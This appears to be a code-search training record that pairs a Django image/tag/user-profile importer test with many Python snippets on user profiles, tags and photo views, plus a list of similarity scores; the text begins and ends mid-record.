auth, created = AuthProfile.objects.get_or_create(user=request.user)\n if not request.user.is_authenticated():\n raise Exception(\"Not Logged in\")\n\n token, created = Token.objects.get_or_create(user=request.user)\n context = {}\n context['TOKEN'] = token.key\n\n return context", "def user(self):\n pass", "def manage_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n else:\n instance.profile.save()", "def get_context_data(self, **kwargs):\n user = ImagerProfile.objects.get(user__username=self.request.user.username)\n # import pdb;\n context = super(ProfileView, self).get_context_data(**kwargs)\n photos = self.request.user.photos.all()\n ph_public = len(photos.filter(published=\"Public\"))\n ph_private = len(photos.filter(published=\"Private\"))\n albums = self.request.user.albums.all()\n al_public = len(albums.filter(published=\"Public\"))\n al_private = len(albums.filter(published=\"Private\"))\n context = {'user': user, 'ph_public': ph_public, 'ph_private': ph_private,\n 'al_public': al_public, 'al_private': al_private}\n return context", "async def mytags(ctx):\n if ctx.message.channel.name.lower() not in bot_channels:\n return\n display = ctx.message.author.display_name\n display_tags = []\n if not user_tags.get(ctx.message.author.name, None):\n return\n for tag_key, tag_count in user_tags[ctx.message.author.name]['tags'].items():\n display_tags.append(\"{0} ({1})\".format(tag_key, tag_count))\n await amor_manager.say(\"{0}'s tag usage: \\n ```{1}```\".format(display, \"\\n\".join(display_tags)))", "def tags():", "def view_friends(request, username):\n user = get_object_or_404(user_model, username=username)\n qs = Friend.objects.select_related(\"UserProfile\").filter(to_user=user)\n friends = [u.from_user for u in qs]\n self = navbar(request.user.id)\n user1 = self.user.id\n for i in friends:\n to_user = i.id\n i.user2 = str(user1)+\"|\"+str(to_user)\n return render_to_response( 'view_friends.html', {'friends': friends, 'self':self})", "def on_user_create(self, user):", "def view_user(request, userid):\n user_to_view = User.objects.get(id=userid)\n profile = Profile.objects.get(user=user_to_view)\n dogs = Dog.objects.all().filter(owner=user_to_view)\n\n return render(request, 'woofer/view_user.html',\n {\n 'profile' : profile,\n 'dogs' : dogs\n })", "def _profile(user):\n profile = UserProfile()\n profile.user_id = user.id\n profile.save()", "def sample_tag(user, name='Service Tag'):\n return Tag.objects.create(user=user, name=name)", "def make_profile_for_user(sender, instance, **kwargs):\n if kwargs['created']:\n new_profile = ImagerProfile(user=instance)\n new_profile.save()", "def sample_tag(user, name='sample tag'):\n return Tag.objects.create(user=user, name=name)", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def userProfile(userid):\n images = get_uploaded_images()\n record = UserProfile.query.filter_by(id=userid).first()\n return render_template('userProfile.html', images=images, record =record)", "def create_sample_tag(user, name=\"spicy\"):\n return Tag.objects.create(custom_user=user, name=name)", "def profile(username):\n try:\n user = mongo.db.users.find_one({\"username\": username})\n terms = list(mongo.db.terms.find(\n {\"submitted_by\": user[\"_id\"], \"rating\": {\"$gt\": -2}}))\n ordered = sortTermsAlphabetically(terms)\n toprated = sortTermsByRating(terms)\n games = list(mongo.db.games.find())\n return render_template(\n \"profile.html\", user=user, terms=ordered,\n toprated=toprated, games=games)\n except TypeError:\n flash(\"This user does not exist\", category=\"error\")\n return redirect(url_for(\"get_terms\"))", "def user_profile(request, id):\n user = User.objects.get(id=id)\n\n return render(request, \"core/profile.html\",{\n \"user\": user,\n \"range\": range(user.stars),\n \"bids_placed\": BuyProduct.objects.filter(\n customer = user\n )\n })", "def create_profile(sender, instance, created, **kwargs):\n if created: \n profile, new = UserProfile.objects.get_or_create(user=instance)", "def save_user_profile(instance, **_):\n instance.profile.save()", "def view_user(user):\n return {\n \"id\": user.id,\n \"first_name\": user.first_name,\n \"last_name\": user.last_name,\n \"email\": user.email,\n \"profile_pic\": user.profile_pic,\n }", "def createUserProfile(user):\n MyProfile.objects.get_or_create(user=user)", "def test_profile_associated_with_users(self):\n profile = ImagerProfile.objects.first()\n self.assertTrue(hasattr(profile, 'user'))\n self.assertIsInstance(profile.user, User)", "def profile_detail(request, pk):\n profile = request.user.userprofile\n user_relationships = profile.get_relationships()\n user_request = profile.get_friend_request()\n\n context = {\n # 'user': user,\n 'profile': profile,\n 'user_relationships': user_relationships,\n 'user_request': user_request\n }\n\n return render(request, 'accounts/profile_detail.html', context)", "def create_profile(sender, **kwargs):\n user = kwargs[\"instance\"]\n if kwargs[\"created\"]:\n user_profile = Profile(user=user)\n user_profile.save()", "def __str__(self):\n return f\"Profile for user {self.user}\"", "def sample_tag(user, name = 'Main Course'): # no need to use **params here since we have only 2 arguments\n return Tag.objects.create(user=user, name=name)", "def profile(request, id):\n u = get_object_or_404(User, pk=id)\n context = ProfileContext(u).get_context()\n return render(request, 'wantedly_app/profile.html', context)", "def show_user_profile(username):\n\n name = USERS[username]\n return f\"<h1>Profile for {name}</h1>\"", "def profile():\n recipes = mongo.db.recipes.find({\"created_by\": session[\"user\"]})\n return render_template(\"accounts/profile.html\", recipes=recipes)", "def view_profile():\n user_id = session.get(\"user_id\")\n \n user = User.query.get(session[\"user_id\"])\n \n return render_template(\"editable_profile_page.html\", user=user)", "def create_profile(sender, **kw):\n user = kw['instance']\n if kw['created']:\n profile = UserProfile(user=user)\n profile.save()", "def get_tagged_user(line, unique_users):\n tagged_user = None\n\n for user in unique_users:\n \n tagged_user = re.search(f\"@{user}\\s*\", line)\n \n if tagged_user != None:\n tagged_user = tagged_user.group(0).replace(\"@\", \"\").strip()\n line = line.replace(f\"@{user} \", \"\")\n break\n \n return (tagged_user, line)", "def user_detail(request, slug):\n user = request.user\n profile = Profile.objects.get(slug=slug)\n albums = profile.albums.all()\n plc_albums = albums.exclude(is_public=False)\n pvt_albums = albums.exclude(is_public=True)\n\n friends = profile.friends.all()\n family = profile.relations.all()\n user_family = user.profile.relations.all()\n user_friends = user.profile.friends.all()\n\n receiver = FriendRequest.objects.filter(from_user=profile.user)\n sender = FriendRequest.objects.filter(to_user=profile.user)\n \n received = []\n sent = []\n for item in receiver:\n received.append(item.id)\n received.append(item.to_user)\n\n for item in sender:\n received.append(item.id)\n sent.append(item.from_user)\n\n template = 'profiles/user_detail.html'\n context = {\n 'profile': profile,\n 'friends': friends,\n 'family': family,\n 'albums': albums,\n 'plc_albums': plc_albums,\n 'pvt_albums': pvt_albums,\n 'received': received,\n 'sent': sent,\n 'user_family': user_family,\n 'user_friends': user_friends,\n }\n return render(request, template, context)", "def user_profile(request, pk=None):\n # user is indentified by his email\n user = User.objects.get(email=request.user.email)\n # show profileposts, fist identifying the user and then ordering by date, new first\n profileposts = ProfilePost.objects.filter(user=request.user).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all()\n # show messages to user, ordering by date, new first. In template an if statement makes sure only the messages of the logged-in user show\n contactuserposts = ContactUser.objects.all().filter(date__lte=timezone.now()\n ).order_by('-date').all() \n return render(request, 'profile.html', {\"profile\": user, 'profileposts': profileposts, 'contactuserposts': contactuserposts})", "def projects_with_tag(request, tag):\n return tag.project_set.filter(user=request.user)", "def create_user_profile(sender, **kwargs):\n\n if kwargs['created']:\n UserProfile.objects.create(user=kwargs['instance'])", "def profile(username):\n username = mongo.db.users.find_one(\n {\"username\": session[\"user\"]})[\"username\"]\n\n tips = list(mongo.db.tips.find())\n return render_template(\"profile.html\", tips=tips)\n\n if session[\"user\"]:\n return render_template(\"profile.html\", username=username)\n\n return redirect(url_for(\"login\"))", "def extract_user_short(data):\n user_pk = data.get(\"id\", data.get(\"pk\"))\n assert user_pk, 'User without pk \"%s\"' % data\n return {\n \"pk\": int(user_pk),\n \"username\": data[\"username\"],\n \"full_name\": data[\"full_name\"],\n \"is_private\": data.get(\"is_private\"),\n \"profile_pic_url\": data[\"profile_pic_url\"],\n \"is_verified\": data.get(\"is_verified\"),\n # \"is_unpublished\": data.get(\"is_unpublished\"),\n }", "def profile_for(email):\n return OrderedDict([(b'email', email), (b'uid', b'10'), (b'role', b'user')])", "def profile(request, username):\n # Get profile information for a user. Use iexact for case-insensitive query\n try:\n profile = User.objects.get(username__iexact=username)\n except ObjectDoesNotExist:\n profile = None\n return render(request, \"network/profile.html\", {\"profile\": profile})\n\n # Find all users following the user whose profile being visited\n followers = User.objects.filter(following=profile.id)\n\n # Get posts for users and put in paginator format\n posts = Post.objects.filter(author=profile).order_by('-timestamp')\n paginator = Paginator(posts, 10)\n\n page_number = request.GET.get('page')\n page_object = paginator.get_page(page_number)\n\n return render(request, \"network/profile.html\", {\n \"profile\": profile, \"followers\": followers, \"posts\": page_object\n })", "def userView(request):\n context = {\n \"user\": request.user,\n }\n return render(request, 'blog/user.html', context)", "def user():", "def save_user_receiver(sender, instance, created, *args, **kwargs):\n print(\"profile created\", instance)\n if created:\n new_profile = UserProfile.objects.get_or_create(owner=instance)", "def getInterestedUsers():", "def view_profile(request, userid=None):\n # Show the currently logged in user's profile if none is specified\n if userid is None:\n user = request.user\n else:\n user = User.objects.get(id=userid)\n profile = Profile.objects.get(user=user)\n dogs = Dog.objects.all().filter(owner=user)\n\n return render(request, 'woofer/view_profile.html',\n {\n 'profile' : profile,\n 'dogs' : dogs\n })", "def test_tag_is_in_the_template(self):\n\n template = Template(\n '{% load profile_admin_editing %}{% edit_link profile %}')\n\n context = Context({'profile': self.profile})\n\n self.assertEqual(self.super_link, template.render(context))", "def getUserCounts(tag, lastNesting=False):\n # Sprawdz czy bez lastNesting (jeszcze bool w wywol fun. w collectDatebase) jest szybciej.\n uc, tagDict = {}, {}\n # Petla po wszystkich wejsciach\n for p1 in pydelicious.get_tagposts(tag):\n user = p1['user']\n if user:\n uc.setdefault(user, 0)\n uc[user] += 1\n # tagDict = {tagDict.setdefault(p2['tags'].replace (' ', '_'), 1) for p2 in pydelicious.get_userposts(p1['user']) if p2['tags']}\n if lastNesting:\n break\n for p2 in pydelicious.get_userposts(p1['user']):\n if p2['tags']:\n tagDict.setdefault(p2['tags'].replace(' ', '_'), 1)\n return (user, uc), tagDict", "def profile(request, user_name=None):\n \n # get the viewed user\n if user_name is None:\n user = request.user.get_profile()\n else:\n user = get_object_or_404(User, username=user_name)\n user = user.get_profile()\n \n # set display name\n if len(user.user.first_name) <= 0:\n user.display_name = user.user.username\n else:\n user.display_name = user.user.first_name + \" \" + user.user.last_name\n \n # set avatar path\n if len(user.avatar.name) <= 0:\n user.avatar_url = settings.MEDIA_URL + \"avatar/noavatar.png\"\n else:\n user.avatar_url = user.avatar.url\n \n # get tracked list, ownedlist and playlist\n trackedlist = user.trackedrecordlist_set.all()\n ownedlist = user.userentry_set.all()\n playlist = user.playlist_set.all()\n context = {\n 'profile_user': user,\n 'trackedlist': trackedlist,\n 'ownedlist': ownedlist,\n 'playlist': playlist\n }\n return render_to_response(\n 'usermgr/profile.html',\n context,\n context_instance = RequestContext(request))", "def author_profile(request, pk):\n author = get_object_or_404(User, pk=pk)\n profileposts = ProfilePost.objects.filter(user=author).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all()\n return render(request, 'profile.html', {\"profile\": author, 'profileposts': profileposts})", "def tag_list(request):\r\n rdict = request.matchdict\r\n username = rdict.get(\"username\", None)\r\n if username:\r\n username = username.lower()\r\n\r\n tags_found = TagMgr.find(username=username)\r\n\r\n return {\r\n 'tag_list': tags_found,\r\n 'tag_count': len(tags_found),\r\n 'username': username,\r\n }", "def add_profile_photo():\n pass", "def user_profile_page(request, pk=None):\n userprofile = get_object_or_404(User, pk=pk)\n profileposts = ProfilePost.objects.filter(user=userprofile).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all() \n return render(request, 'profile.html', {\"profile\": userprofile, 'profileposts': profileposts})", "def create_profile(sender, instance, created, **kwargs):\n if created:\n profile, created = UserProfile.objects.get_or_create(user=instance)", "def profile(request):\n return render(request, 'profile.html', context)", "def renderProfile(request, user, identities):\n sourcesResults = lifestream.models.Feed.objects.order_by('url').filter(user__username=user.username)\n sources = []\n for s in sourcesResults:\n if s.title:\n sources.append({'title': s.title, 'url': s.url})\n \n # avatar\n \n gravatarHash = hashlib.md5(user.email).hexdigest()\n avatar_url = \"http://www.gravatar.com/avatar/%s.jpg?d=monsterid&s=80\" % gravatarHash\n \n t = django.template.loader.select_template(('foo', 'lifestream/profile_blurb.html'))\n c = django.template.Context(\n {'avatar_src': avatar_url, 'avatar_width':'80', 'avatar_height':'80',\n 'user': user,\n 'username': user.username,\n 'preferences': json.loads(user.get_profile().properties),\n 'sources': sources,\n 'identities': identities})\n return t.render(c)", "def getdat(user):\r\n profile = user.profile\r\n return [user.username, user.email] + [getattr(profile, xkey, '') for xkey in profkeys]", "def perform_create(self, serializer): # this method runs everytime a POST method is called\n serializer.save(user_profile=self.request.user)", "def get_one_user():", "def tagger():", "def public_profile(request, username):\n if User.objects.filter(username__iexact=username, is_active=True).exists():\n public_user = User.objects.get(username__iexact=username)\n public_email = public_user.associated_emails.filter(is_public=True).first()\n else:\n raise Http404()\n\n # get list of projects\n projects = PublishedProject.objects.filter(authors__user=public_user).order_by('-publish_datetime')\n\n\n return render(request, 'user/public_profile.html', {\n 'public_user':public_user, 'profile':public_user.profile,\n 'public_email':public_email, 'projects':projects})", "def user_post_save(sender, instance, created, **kwargs):\n\t\tif created == True:\n\t\t\tup = UserProfile()\n\t\t\tup.user = instance\n\t\t\tup.save()", "def get_user_profile(self):\n return self.request('get', 'id/users')", "def image_thumb_tag(self):\n u = self.user\n uf = self.app.url_for\n image = None\n if u.image is not None and u.image!=\"\":\n try:\n image = uf(\"asset\", asset_id = self.app.module_map.uploader.get(u.image).variants['userlist']._id)\n except AssetNotFound:\n pass\n except KeyError:\n pass\n if image is not None:\n return \"\"\"<img alt=\"%s\" class=\"profile-image-userlist\" src=\"%s\">\"\"\" %(u.fullname, image)\n return \"\"\"<div class=\"profile-image-userlist missing\"><i class=\"fa fa-user\"></i></div>\"\"\"", "def get_context_data(self, **kwargs):\n username = self.kwargs.get('username', None)\n if username:\n user = get_object_or_404(User, username=username)\n try:\n profile = user.get_profile()\n except Profile.DoesNotExist:\n raise Http404\n context_data = super(PhotosListView, self).get_context_data(**kwargs)\n context_data['profile'] = profile\n return context_data\n\n return super(PhotosListView, self).get_context_data(**kwargs)", "def get_profile(user_id):\n return User.objects.select_related('userprofile', 'userstatistics') \\\n .get(pk=user_id)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n user_profile = UserProfile.objects.create(user=instance)" ]
[ "0.6036632", "0.59151506", "0.5854669", "0.5790308", "0.5763715", "0.574283", "0.5727083", "0.57143545", "0.57116055", "0.56976116", "0.5677059", "0.5661893", "0.56557196", "0.56339324", "0.5570487", "0.5566566", "0.5553686", "0.5552441", "0.55499566", "0.5542527", "0.5512405", "0.5504821", "0.54956746", "0.5484684", "0.542978", "0.54278225", "0.5427484", "0.5427484", "0.5407592", "0.5376521", "0.53692675", "0.53495944", "0.5341351", "0.53324896", "0.52820903", "0.5276733", "0.52762914", "0.52740175", "0.52638125", "0.5261291", "0.52530897", "0.52502257", "0.5233098", "0.521106", "0.52014023", "0.5192947", "0.51896083", "0.51896083", "0.5186795", "0.51815104", "0.5179892", "0.5177855", "0.5152058", "0.51517266", "0.51491225", "0.51446295", "0.514165", "0.5133557", "0.51105326", "0.51033485", "0.50978976", "0.5096247", "0.5089292", "0.5073722", "0.5070082", "0.50506836", "0.50493187", "0.5043407", "0.50425094", "0.5039894", "0.5037675", "0.50311464", "0.5031005", "0.5025469", "0.50250334", "0.50121886", "0.500064", "0.49964982", "0.49951017", "0.49924913", "0.4987323", "0.4972659", "0.4971254", "0.49682057", "0.49681073", "0.49667114", "0.49654046", "0.49644175", "0.49590638", "0.4950115", "0.49469864", "0.4942378", "0.4938487", "0.4936969", "0.4933872", "0.49323708", "0.49317524", "0.49303073", "0.49291107", "0.4924284", "0.49241185" ]
0.0
-1
Image (m)(m)> Tag > UserProfile > User e.g. see factory.create_tags_images for the creation of the below items > We'll assert that populating related data on the m2m field > constructs the expect > retrieves the correct results > doesn't retrieve the incrorrect results Image.pk Image.name Tag.name i grass green i grass blue k sun yellow l grass m sun
def test_m2m_dependent_object_import(self): user_profile: UserProfile = self.user_profiles[0] # See self.setUp() # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************ # Initialize Importers image_manager = ImporterManager(importer=ImageImporter()) tag_manager = ImporterManager(importer=TagImporter()) up_manager = ImporterManager(importer=UserProfileImporter()) company_manger = ImporterManager(importer=CompanyImporter()) user_manager = ImporterManager(importer=UserImporter()) # Populate leaf models of dependency tree with kv data for row,image in enumerate(self.images): user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row) company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row) #: Retrieve data associated with kv data user_manager.get_available_rows() company_manger.get_available_rows() #: Populate data up the dependency tree with retrieved rows for row,image in enumerate(self.images): up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row) up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row) #: Retrieve data associated with models depended upon up_manager.get_available_rows() tag_manager.update_kvs('slug', 'blue', row=0, col=0) tag_manager.update_kvs('slug', 'green', row=0, col=1) tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0) tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0) tag_manager.update_kvs('slug', 'yellow', row=1, col=0) tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0) tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0) #: Retrieve associate intermediate data tag_manager.get_available_rows() for row,image in enumerate(self.images): image_manager.update_kvs('path', image.path, row=row) image_manager.update_kvs('name', image.name, row=row) image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row) image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row) image_manager.get_available_rows() self.assertNotEqual(image_manager.get_object_or_list(0), []) self.assertIsInstance(image_manager.get_object_or_list(0), Image) self.assertNotEqual(image_manager.get_object_or_list(1), []) self.assertIsInstance(image_manager.get_object_or_list(1), Image)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_image(self):\n\n image = Image.query.filter(Image.tag1 == \"Denali\").first()\n self.assertEqual(image.tag1, \"Denali\")", "def test_users_photos_view_set_get_own_photos(self):\n # Create user and data\n user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='aov_hov')\n category = photo_models.PhotoClassification.objects\\\n .create_or_update(name='Test', classification_type='category')\n\n photo1 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n\n photo2 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/users/{}/photos'.format(user.id), format='json')\n result = request.data['results']\n\n self.assertEquals(request.status_code, 200)\n self.assertEquals(len(result), 2)\n self.assertEquals(result[0]['id'], photo2.id) # newest first\n self.assertIn('dimensions', result[0])\n self.assertIn('image_blurred', result[0])\n self.assertIn('image', result[0])", "def test_ingredients_by_id_image(self):\n pass", "def test_album_image_user(self):\n self.assertEqual(self.album.user, self.photo.user)", "def test_add_to_bag(self):\n user = User.objects.create(username='test')\n image = Image.objects.create(\n img_title='test', base_price=0, user_id=user)\n bag = {image.id: 1}\n response = self.client.post('/images/', bag)\n self.assertEqual(response.status_code, 200)", "def test_aov_web_user_view_get_successful(self):\n # Create test data\n # weight of 1\n user = account_models.User.objects.create_user(age=25, email='[email protected]', first_name='Martin',\n last_name='Ronquillo', location='Boise',\n social_name='@ronquilloaeon', password='pass',\n username='aov_hov')\n # weight of 6\n other_user = account_models.User.objects.create_user(email=\"[email protected]\", password=\"test\", username=\"testy\")\n category = PhotoClassification.objects.create_or_update(name='Test', classification_type='category')\n\n\n photo1 = Photo(image=Image(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n PhotoComment.objects.create_or_update(photo=photo1, comment=\"Nice one!\", user=other_user)\n\n photo2 = Photo(image=Image(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=other_user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n request = APIClient().get('/api/aov-web/users/top', format='json')\n results = request.data[\"results\"]\n\n self.assertEqual(len(results), 2)\n self.assertEqual(results[0][\"id\"], other_user.id)\n self.assertEqual(results[1][\"id\"], user.id)", "def test_images(self):\n\n message = {\"method\": \"images\", \"params\": {\"elem\": None}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"images\")\n self.assertIsInstance(response[\"result\"], list)\n\n images = [i[\"tag\"] for i in response[\"result\"]]\n\n self.assertIn(self.tag_image, images)", "def setUp(self):\n # slugify_unique should return 'foo\n # so image names would be just 'foo.jpg'\n with mock.patch.object(\n models,\n 'slugify_unique',\n return_value='foo'\n ):\n # create an image attached to the content object\n self.image = models.Image.objects.create(\n image=get_image_in_memory_data(),\n position=0,\n content_type=ContentType.objects.get_for_model(TestModel),\n object_id=self.object.id\n )\n # load created image from the database\n # it's necessary because the Image.image value differs\n # in loaded images (the field adds the path while saving)\n # created image: foo.jpg\n # loaded image: gallery/foo.jpg\n self.image = self.get_image()", "def test_users_photos_view_set_get_successful(self):\n # Create user and data\n access_user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='m')\n user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='aov_hov')\n category = photo_models.PhotoClassification.objects\\\n .create_or_update(name='Test', classification_type='category')\n\n photo1 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n\n photo2 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n # Simulate auth\n token = test_helpers.get_token_for_user(access_user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/users/{}/photos'.format(user.id), format='json')\n result = request.data['results']\n\n self.assertEquals(request.status_code, 200)\n self.assertEquals(len(result), 2)\n self.assertEquals(result[0]['id'], photo2.id) # newest first\n self.assertIn('dimensions', result[0])\n self.assertIn('image_blurred', result[0])\n self.assertIn('image', result[0])", "def test_list_image_metadata(self):\n pass", "def test_get_owner_image(self):\n\n # user1 is owner of image_id 1\n # user2 is owner of image ids (2,3)\n for image_id in range(1, 4):\n url = reverse(self.url_name_one, args=(image_id,))\n if image_id == 1:\n self.client.force_authenticate(self.user1)\n else:\n self.client.force_authenticate(self.user2)\n\n response = self.client.get(url, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n if image_id == 1:\n self.assertEqual(response.data[\"owner\"], \"user1\")\n else:\n self.assertEqual(response.data[\"owner\"], \"user2\")\n\n # user2 try to get image_id 1 which is owner user1\n url = reverse(self.url_name_one, args=(1,))\n response = self.client.get(url, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_retrieval_of_user_photos(self):\t\n\t\tget_response = self.client.get(reverse('photos'))\n\n\t\tself.assertEqual(get_response.status_code, status.HTTP_200_OK)\n\t\tdata = [i.values() for i in get_response.data]\n\t\tself.assertIn(u'{}'.format(self.image_name), data[0])", "def test_create(self):\n data = {\n 'image': images.load_image()\n }\n photo = Photo.objects.create(**data)\n self.assertTrue(photo.pk)", "def test_list_image(self):\n pass", "def test_user_photo_retrieval_by_id_succeeds(self):\n\t\t# url = reverse('photodetail')\t\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user)\n\t\tself.created_image.save()\n\t\tresponse = self.client.get('/api/modify_photo/?id={}'.format(self.created_image.id))\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data.get('name'), self.image_name)\n\t\tos.remove('static/media/' + str(self.created_image.image))\n\t\tdel self.created_image", "def test_tags_limited_to_user_tags(self):\n\n user2 = create_user(\n fname='Test2',\n lname='User2',\n email='[email protected]',\n password='testpass2'\n )\n\n Tag.objects.create(user=user2, name='Vegan')\n tag = Tag.objects.create(user=self.user, name='Dessert')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def create_image(user_id, image_name, tag1, tag2, tag3):\n\n image = Image(user_id=user_id, image_name=image_name, tag1=tag1, tag2=tag2, tag3=tag3)\n\n db.session.add(image)\n db.session.commit()\n\n return image", "def test_equipment_by_id_image(self):\n pass", "def setUp(self):\n self.new_image = Images(image=\"image.jpg\", image_name=\"roses\", caption=\"live\",\n user_id=1, user='Joy', likes=0, posted_on=\"111-2019\")", "def test_tag_image_duplicate(self):\n\n message = {\n \"method\": \"build_image\",\n \"params\": {\"url\": self.url,\n \"tag_image\": self.tag_image}\n }\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"error\")", "def test_recipe_nutrition_by_id_image(self):\n pass", "def multi_tag_image(self, owner_userid, tag_userid, image_ids, tag_names):\n\t\ttry:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\t\ttag_username = validation.cast_integer(tag_userid, 'userid')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\n\t\tself.log.debug(\"about to tag %d images with %d tags\" % (len(image_ids), len(tag_names)))\n\t\tfor id in image_ids:\n\t\t\ttry:\n\t\t\t\tid = validation.cast_integer(id, 'image_id')\n\t\t\texcept errors.ValidationError, ex:\n\t\t\t\treturn utils.return_deferred_error(ex.value)\n\t\t\tself.log.debug(\"image %s\" % id)\n\n\t\t# do all inserts in a single transaction\n\t\tdef tag_txn(txn, owner, tagger, ids, tags):\n\t\t\tfor id in ids:\n\t\t\t\tid = validation.cast_integer(id, 'id')\n\t\t\t\tfor tag in tags:\n\t\t\t\t\ttag = tag.lower()\n\t\t\t\t\ttxn.execute(\"\"\"\n\t\t\t\t\t\tselect zoto_insert_user_image_tag(\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s,\n\t\t\t\t\t\t\t%s\n\t\t\t\t\t\t)\n\t\t\t\t\t\"\"\", (owner, id, tag, tagger))\n\t\treturn self.app.db.runInteraction(tag_txn, owner_userid, tag_userid, image_ids, tag_names)", "def test_get_chef_with_photo(self):\n url = '/0/chefs/' + str(self.user.pk)\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('chef', resp.data)\n self.assertNotIn('photo', resp.data['chef'])\n\n self.user.avatar_photos.create(s3_url='image') # Create photo\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('chef', resp.data)\n self.assertIn('photo', resp.data['chef'])\n keys = set(('id', 'url', 'creation_date', 'edit_date'))\n self.assertEqual(keys, set(resp.data['chef']['photo']))", "def images_init(self):\n\n self.user_image = UserImage(\n user_id=self.user_id,\n tag=self.tag_image,\n image_id='sha256:342fea22',\n created=1524229897,\n size=191623983\n )\n self.user_image.save()\n\n CLIENT.images_list.append(\n {'Containers': -1,\n 'Created': 1524229897,\n 'Id': 'sha256:342fea22',\n 'Labels': None,\n 'ParentId': 'sha256:55d98c2',\n 'RepoDigests': None,\n 'RepoTags': [self.tag_image],\n 'SharedSize': -1,\n 'Size': 191623983,\n 'VirtualSize': 191623983}\n )", "def setUp(self):\n self.new_user = User(\n username=\"Hey\", email=\"[email protected]\", password=\"heyjfbghjdnf\")\n self.new_user.save()\n self.new_image = Image(name='Hey', user=self.new_user)\n self.new_image.save()", "def test_profile_image_requested_field(self):\n user_2 = UserFactory.create(password=self.password)\n # Ensure that parental controls don't apply to this user\n user_2.profile.year_of_birth = 1970\n user_2.profile.save()\n source_threads = [\n self.create_source_thread(),\n self.create_source_thread({\"user_id\": str(user_2.id), \"username\": user_2.username}),\n ]\n\n self.register_get_user_response(self.user, upvoted_ids=[\"test_thread\"])\n self.register_get_threads_response(source_threads, page=1, num_pages=1)\n self.create_profile_image(self.user, get_profile_image_storage())\n self.create_profile_image(user_2, get_profile_image_storage())\n\n response = self.client.get(\n self.url,\n {\"course_id\": str(self.course.id), \"requested_fields\": \"profile_image\"},\n )\n assert response.status_code == 200\n response_threads = json.loads(response.content.decode('utf-8'))['results']\n\n for response_thread in response_threads:\n expected_profile_data = self.get_expected_user_profile(response_thread['author'])\n response_users = response_thread['users']\n assert expected_profile_data == response_users[response_thread['author']]", "def setUp(self):\n account_models.User.objects.create_user(email='[email protected]', password='WhoAmI', username='aov1')\n photo_models.PhotoClassification.objects.create_or_update(name='City',\n category_image=Photo(\n open('apps/common/test/data/photos/small.jpg',\n 'rb')),\n icon=Photo(\n open('apps/common/test/data/photos/small.jpg',\n 'rb')))\n abstract = photo_models.PhotoClassification.objects.create_or_update(name='Abstract')\n photo_models.PhotoClassification.objects.create_or_update(name='Rural', classification_type='category')\n photo_feed = photo_models.PhotoFeed.objects.create_or_update(name='Abstract')\n abstract.photo_feed = photo_feed\n abstract.save()", "def test_user_photo_retrieval_by_name_succeeds(self):\n\t\t# url = reverse('photodetail')\t\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user)\n\t\tself.created_image.save()\n\t\tresponse = self.client.get('/api/image/?name={}'.format(self.created_image.name))\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data.get('name'), 